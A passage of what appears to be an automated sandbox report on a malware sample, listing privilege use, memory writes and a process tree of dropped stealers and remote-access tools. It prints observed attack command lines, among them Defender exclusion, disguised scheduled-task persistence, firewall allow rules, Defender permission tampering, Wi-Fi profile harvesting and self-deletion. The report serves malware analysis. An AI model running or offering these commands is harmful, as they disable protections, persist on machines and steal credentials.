powershell.exepowershell.exeinstallutil.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4756 powershell.exe Token: SeDebugPrivilege 2604 powershell.exe Token: SeDebugPrivilege 1020 installutil.exe Token: SeShutdownPrivilege 3484 Token: SeCreatePagefilePrivilege 3484 Token: SeShutdownPrivilege 3484 Token: SeCreatePagefilePrivilege 3484 Token: SeShutdownPrivilege 3484 Token: SeCreatePagefilePrivilege 3484 Token: SeShutdownPrivilege 3484 Token: SeCreatePagefilePrivilege 3484 Token: SeShutdownPrivilege 3484 Token: SeCreatePagefilePrivilege 3484 Token: SeShutdownPrivilege 3484 Token: SeCreatePagefilePrivilege 3484 Token: SeShutdownPrivilege 3484 Token: SeCreatePagefilePrivilege 3484 Token: SeShutdownPrivilege 3484 Token: SeCreatePagefilePrivilege 3484 Token: SeShutdownPrivilege 3484 Token: SeCreatePagefilePrivilege 3484 Token: SeShutdownPrivilege 3484 Token: SeCreatePagefilePrivilege 3484 Token: SeDebugPrivilege 5852 powershell.exe Token: SeShutdownPrivilege 3484 Token: SeCreatePagefilePrivilege 3484 Token: SeShutdownPrivilege 3484 Token: SeCreatePagefilePrivilege 3484 Token: SeShutdownPrivilege 3484 Token: SeCreatePagefilePrivilege 3484 Token: SeShutdownPrivilege 3484 Token: SeCreatePagefilePrivilege 3484 Token: SeShutdownPrivilege 3484 Token: SeCreatePagefilePrivilege 3484 Token: SeShutdownPrivilege 3484 Token: SeCreatePagefilePrivilege 3484 Token: SeShutdownPrivilege 3484 Token: SeCreatePagefilePrivilege 3484 Token: SeShutdownPrivilege 3484 Token: SeCreatePagefilePrivilege 3484 Token: SeShutdownPrivilege 3484 Token: SeCreatePagefilePrivilege 3484 Token: SeShutdownPrivilege 3484 Token: SeCreatePagefilePrivilege 3484 Token: SeShutdownPrivilege 3484 Token: SeCreatePagefilePrivilege 3484 Token: SeShutdownPrivilege 3484 Token: SeCreatePagefilePrivilege 3484 Token: SeShutdownPrivilege 3484 Token: SeCreatePagefilePrivilege 3484 Token: SeShutdownPrivilege 3484 Token: SeCreatePagefilePrivilege 3484 Token: SeDebugPrivilege 5956 powershell.exe Token: SeDebugPrivilege 5936 powershell.exe Token: SeDebugPrivilege 2740 powershell.exe Token: SeDebugPrivilege 6012 powershell.exe Token: SeShutdownPrivilege 3484 Token: SeCreatePagefilePrivilege 3484 Token: SeShutdownPrivilege 3484 Token: SeCreatePagefilePrivilege 3484 Token: SeShutdownPrivilege 3484 Token: SeCreatePagefilePrivilege 3484 Token: SeShutdownPrivilege 3484 Token: SeCreatePagefilePrivilege 3484 -
Suspicious use of FindShellTrayWindow 12 IoCs
Processes:
pid process 3484 3484 3484 3484 3484 3484 3484 3484 3484 3484 3484 3484 -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
u3tw.1.exeu1rc.1.exeufs.1.exepid process 3640 u3tw.1.exe 5472 u1rc.1.exe 6064 ufs.1.exe -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid process 3484 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
bb4a0140d4b23f0f4d334dae72e8bd9cd865158f65f7a7ed65714723a7eeec33.exeexplorha.exerundll32.exerundll32.exechrosha.exeboom8.exeISetup8.exefile300un.execmd.exeinstallutil.exedescription pid process target process PID 3948 wrote to memory of 1492 3948 bb4a0140d4b23f0f4d334dae72e8bd9cd865158f65f7a7ed65714723a7eeec33.exe explorha.exe PID 3948 wrote to memory of 1492 3948 bb4a0140d4b23f0f4d334dae72e8bd9cd865158f65f7a7ed65714723a7eeec33.exe explorha.exe PID 3948 wrote to memory of 1492 3948 bb4a0140d4b23f0f4d334dae72e8bd9cd865158f65f7a7ed65714723a7eeec33.exe explorha.exe PID 1492 wrote to memory of 4200 1492 explorha.exe 4e8bb0e286.exe PID 1492 wrote to memory of 4200 1492 explorha.exe 4e8bb0e286.exe PID 1492 wrote to memory of 4200 1492 explorha.exe 4e8bb0e286.exe PID 1492 wrote to memory of 4496 1492 explorha.exe rundll32.exe PID 1492 wrote to memory of 4496 1492 explorha.exe rundll32.exe PID 1492 wrote to memory of 4496 1492 explorha.exe rundll32.exe PID 4496 wrote to memory of 1304 4496 rundll32.exe rundll32.exe PID 4496 wrote to memory of 1304 4496 rundll32.exe rundll32.exe PID 1304 wrote to memory of 1524 1304 rundll32.exe netsh.exe PID 1304 wrote to memory of 1524 1304 rundll32.exe netsh.exe PID 1304 wrote to memory of 4756 1304 rundll32.exe powershell.exe PID 1304 wrote to memory of 4756 1304 rundll32.exe powershell.exe PID 1492 wrote to memory of 3380 1492 explorha.exe explorha.exe PID 1492 wrote to memory of 3380 1492 explorha.exe explorha.exe PID 1492 wrote to memory of 3380 1492 explorha.exe explorha.exe PID 1492 wrote to memory of 4964 1492 explorha.exe lumma21.exe PID 1492 wrote to memory of 4964 1492 explorha.exe lumma21.exe PID 1492 wrote to memory of 4964 1492 explorha.exe lumma21.exe PID 1492 wrote to memory of 1184 1492 explorha.exe rundll32.exe PID 1492 wrote to memory of 1184 1492 explorha.exe rundll32.exe PID 1492 wrote to memory of 1184 1492 explorha.exe rundll32.exe PID 380 wrote to memory of 3680 380 chrosha.exe boom8.exe PID 380 wrote to memory of 3680 380 chrosha.exe boom8.exe PID 380 wrote to memory of 3680 380 chrosha.exe boom8.exe PID 3680 wrote to memory of 3808 3680 boom8.exe schtasks.exe PID 3680 wrote to memory of 3808 3680 boom8.exe schtasks.exe PID 3680 wrote to memory of 3808 3680 boom8.exe schtasks.exe PID 3680 wrote to memory of 4964 3680 boom8.exe ISetup8.exe PID 3680 wrote to memory of 4964 3680 boom8.exe ISetup8.exe PID 3680 wrote to memory of 4964 3680 boom8.exe ISetup8.exe PID 3680 wrote to memory of 4900 3680 boom8.exe toolspub1.exe PID 3680 wrote to memory of 4900 3680 boom8.exe toolspub1.exe PID 3680 wrote to memory of 4900 3680 boom8.exe toolspub1.exe PID 4964 wrote to memory of 4668 4964 ISetup8.exe u3tw.0.exe PID 4964 wrote to memory of 4668 4964 ISetup8.exe u3tw.0.exe PID 4964 wrote to memory of 4668 4964 ISetup8.exe u3tw.0.exe PID 380 wrote to memory of 4496 380 chrosha.exe file300un.exe PID 380 wrote to memory of 4496 380 chrosha.exe file300un.exe PID 4496 wrote to memory of 2604 4496 file300un.exe powershell.exe PID 4496 wrote to memory of 2604 4496 file300un.exe powershell.exe PID 4496 wrote to memory of 3376 4496 file300un.exe cmd.exe PID 4496 wrote to memory of 3376 4496 file300un.exe cmd.exe PID 4496 wrote to memory of 1020 4496 file300un.exe installutil.exe PID 4496 wrote to memory of 1020 4496 file300un.exe installutil.exe PID 4496 wrote to memory of 1020 4496 file300un.exe installutil.exe PID 4496 wrote to memory of 1020 4496 file300un.exe installutil.exe PID 4496 wrote to memory of 1020 4496 file300un.exe installutil.exe PID 4496 wrote to memory of 1020 4496 file300un.exe installutil.exe PID 4496 wrote to memory of 1020 4496 file300un.exe installutil.exe PID 4496 wrote to memory of 1020 4496 file300un.exe installutil.exe PID 4964 wrote to memory of 3640 4964 ISetup8.exe u3tw.1.exe PID 4964 wrote to memory of 3640 4964 ISetup8.exe u3tw.1.exe PID 4964 wrote to memory of 3640 4964 ISetup8.exe u3tw.1.exe PID 3376 wrote to memory of 436 3376 cmd.exe schtasks.exe PID 3376 wrote to memory of 436 3376 cmd.exe schtasks.exe PID 1020 wrote to memory of 568 1020 installutil.exe NDETJa6sPxmbP4JlULJ9hFAT.exe PID 1020 wrote to memory of 568 1020 installutil.exe NDETJa6sPxmbP4JlULJ9hFAT.exe PID 1020 wrote to memory of 568 1020 installutil.exe NDETJa6sPxmbP4JlULJ9hFAT.exe PID 1020 wrote to memory of 2280 1020 installutil.exe Conhost.exe PID 1020 wrote to memory of 2280 1020 installutil.exe Conhost.exe PID 1020 wrote to memory of 2280 1020 installutil.exe Conhost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2236
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵PID:6084
-
-
C:\Users\Admin\AppData\Local\Temp\bb4a0140d4b23f0f4d334dae72e8bd9cd865158f65f7a7ed65714723a7eeec33.exe"C:\Users\Admin\AppData\Local\Temp\bb4a0140d4b23f0f4d334dae72e8bd9cd865158f65f7a7ed65714723a7eeec33.exe"1⤵
- DcRat
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3948 -
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Users\Admin\AppData\Local\Temp\1000022001\4e8bb0e286.exe"C:\Users\Admin\AppData\Local\Temp\1000022001\4e8bb0e286.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
PID:4200
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4496 -
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1304 -
C:\Windows\system32\netsh.exenetsh wlan show profiles5⤵PID:1524
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\660967641992_Desktop.zip' -CompressionLevel Optimal5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4756
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"3⤵PID:3380
-
-
C:\Users\Admin\AppData\Local\Temp\1000035001\lumma21.exe"C:\Users\Admin\AppData\Local\Temp\1000035001\lumma21.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:4964
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main3⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:1184
-
-
-
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exeC:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3744
-
C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exeC:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:380 -
C:\Users\Admin\AppData\Local\Temp\1000082001\boom8.exe"C:\Users\Admin\AppData\Local\Temp\1000082001\boom8.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3680 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN boom8.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000082001\boom8.exe" /F3⤵
- DcRat
- Creates scheduled task(s)
PID:3808
-
-
C:\Users\Admin\AppData\Local\Temp\1000172001\ISetup8.exe"C:\Users\Admin\AppData\Local\Temp\1000172001\ISetup8.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4964 -
C:\Users\Admin\AppData\Local\Temp\u3tw.0.exe"C:\Users\Admin\AppData\Local\Temp\u3tw.0.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4668 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\AKEBFCFIJJ.exe"5⤵PID:232
-
C:\Users\Admin\AppData\Local\Temp\AKEBFCFIJJ.exe"C:\Users\Admin\AppData\Local\Temp\AKEBFCFIJJ.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
PID:4628 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\AKEBFCFIJJ.exe7⤵PID:212
-
C:\Windows\SysWOW64\PING.EXEping 2.2.2.2 -n 1 -w 30008⤵
- Runs ping.exe
PID:2684
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 26525⤵
- Program crash
PID:7152
-
-
-
C:\Users\Admin\AppData\Local\Temp\u3tw.1.exe"C:\Users\Admin\AppData\Local\Temp\u3tw.1.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3640 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "5⤵PID:5272
-
C:\Windows\SysWOW64\chcp.comchcp 12516⤵PID:5740
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F6⤵
- DcRat
- Creates scheduled task(s)
PID:4028
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4964 -s 16604⤵
- Program crash
PID:3460
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub1.exe"C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub1.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4900
-
-
C:\Users\Admin\AppData\Local\Temp\1000174001\4767d2e713f2021e8fe856e3ea638b58.exe"C:\Users\Admin\AppData\Local\Temp\1000174001\4767d2e713f2021e8fe856e3ea638b58.exe"3⤵
- Executes dropped EXE
PID:4732 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious use of AdjustPrivilegeToken
PID:5956
-
-
C:\Users\Admin\AppData\Local\Temp\1000174001\4767d2e713f2021e8fe856e3ea638b58.exe"C:\Users\Admin\AppData\Local\Temp\1000174001\4767d2e713f2021e8fe856e3ea638b58.exe"4⤵
- DcRat
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
PID:6496 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:6828
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:5780
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:6040
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5320
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:6904
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
PID:5700 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2712
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- DcRat
- Creates scheduled task(s)
PID:5216
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵PID:5708
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:828
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5288
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll6⤵
- Executes dropped EXE
PID:3580
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- DcRat
- Creates scheduled task(s)
PID:6060
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"6⤵
- Executes dropped EXE
PID:5740 -
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵PID:6256
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
- Launches sc.exe
PID:5716
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000085001\file300un.exe"C:\Users\Admin\AppData\Local\Temp\1000085001\file300un.exe"2⤵
- DcRat
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4496 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2604
-
-
C:\Windows\system32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\.BLRVzdv\svchost.exe"' & exit3⤵
- Suspicious use of WriteProcessMemory
PID:3376 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\.BLRVzdv\svchost.exe"'4⤵
- DcRat
- Creates scheduled task(s)
PID:436
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1020 -
C:\Users\Admin\Pictures\NDETJa6sPxmbP4JlULJ9hFAT.exe"C:\Users\Admin\Pictures\NDETJa6sPxmbP4JlULJ9hFAT.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
PID:568 -
C:\Users\Admin\AppData\Local\Temp\ufs.0.exe"C:\Users\Admin\AppData\Local\Temp\ufs.0.exe"5⤵
- Executes dropped EXE
PID:5260 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5260 -s 13006⤵
- Program crash
PID:6296
-
-
-
C:\Users\Admin\AppData\Local\Temp\ufs.1.exe"C:\Users\Admin\AppData\Local\Temp\ufs.1.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6064 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "6⤵PID:5348
-
C:\Windows\SysWOW64\chcp.comchcp 12517⤵PID:5876
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F7⤵
- DcRat
- Creates scheduled task(s)
PID:3836
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 568 -s 15365⤵
- Program crash
PID:6048
-
-
-
C:\Users\Admin\Pictures\9tffILNsblfrBiKalVXQOm4E.exe"C:\Users\Admin\Pictures\9tffILNsblfrBiKalVXQOm4E.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
PID:2280 -
C:\Users\Admin\AppData\Local\Temp\u1rc.0.exe"C:\Users\Admin\AppData\Local\Temp\u1rc.0.exe"5⤵
- Executes dropped EXE
PID:6004 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6004 -s 12206⤵
- Program crash
PID:6192
-
-
-
C:\Users\Admin\AppData\Local\Temp\u1rc.1.exe"C:\Users\Admin\AppData\Local\Temp\u1rc.1.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5472 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "6⤵PID:5452
-
C:\Windows\SysWOW64\chcp.comchcp 12517⤵PID:5716
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F7⤵
- DcRat
- Creates scheduled task(s)
PID:5904
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 11605⤵
- Program crash
PID:5640
-
-
-
C:\Users\Admin\Pictures\WgtdfAK8BX6kdw8MwWOFnUAu.exe"C:\Users\Admin\Pictures\WgtdfAK8BX6kdw8MwWOFnUAu.exe"4⤵
- Executes dropped EXE
PID:3744 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Suspicious use of AdjustPrivilegeToken
PID:6012
-
-
C:\Users\Admin\Pictures\WgtdfAK8BX6kdw8MwWOFnUAu.exe"C:\Users\Admin\Pictures\WgtdfAK8BX6kdw8MwWOFnUAu.exe"5⤵
- DcRat
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
PID:6488 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:6820
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"6⤵PID:5452
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes7⤵
- Modifies Windows Firewall
PID:5192
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:6620 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:5740
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:6884
-
-
-
-
C:\Users\Admin\Pictures\eazOqh4NuQfCeody6sSmmD8y.exe"C:\Users\Admin\Pictures\eazOqh4NuQfCeody6sSmmD8y.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3460 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:5836 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5836 -s 6166⤵
- Program crash
PID:5772
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5836 -s 6126⤵
- Program crash
PID:5440
-
-
-
-
C:\Users\Admin\Pictures\XTiiAa1fPkJ3xiLY8hB760oY.exe"C:\Users\Admin\Pictures\XTiiAa1fPkJ3xiLY8hB760oY.exe"4⤵
- Executes dropped EXE
PID:5560 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Suspicious use of AdjustPrivilegeToken
PID:5936
-
-
C:\Users\Admin\Pictures\XTiiAa1fPkJ3xiLY8hB760oY.exe"C:\Users\Admin\Pictures\XTiiAa1fPkJ3xiLY8hB760oY.exe"5⤵
- DcRat
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:6476 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:6800
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"6⤵PID:5672
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes7⤵
- Modifies Windows Firewall
PID:5436
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
PID:6696
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
PID:6844
-
-
-
-
C:\Users\Admin\Pictures\HAxnl42jKWN9YwHZHa2OAHww.exe"C:\Users\Admin\Pictures\HAxnl42jKWN9YwHZHa2OAHww.exe"4⤵
- Executes dropped EXE
PID:5592 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2740
-
-
C:\Users\Admin\Pictures\HAxnl42jKWN9YwHZHa2OAHww.exe"C:\Users\Admin\Pictures\HAxnl42jKWN9YwHZHa2OAHww.exe"5⤵
- DcRat
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
PID:6528 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:6852
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"6⤵PID:7116
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes7⤵
- Modifies Windows Firewall
PID:1164
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5188
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4924
-
-
-
-
C:\Users\Admin\Pictures\fH6393mwgNgh1D0guCtDCA52.exe"C:\Users\Admin\Pictures\fH6393mwgNgh1D0guCtDCA52.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5788
-
-
C:\Users\Admin\Pictures\CYoOmU856pwWKZXiUIbstHLU.exe"C:\Users\Admin\Pictures\CYoOmU856pwWKZXiUIbstHLU.exe" --silent --allusers=04⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
PID:5144 -
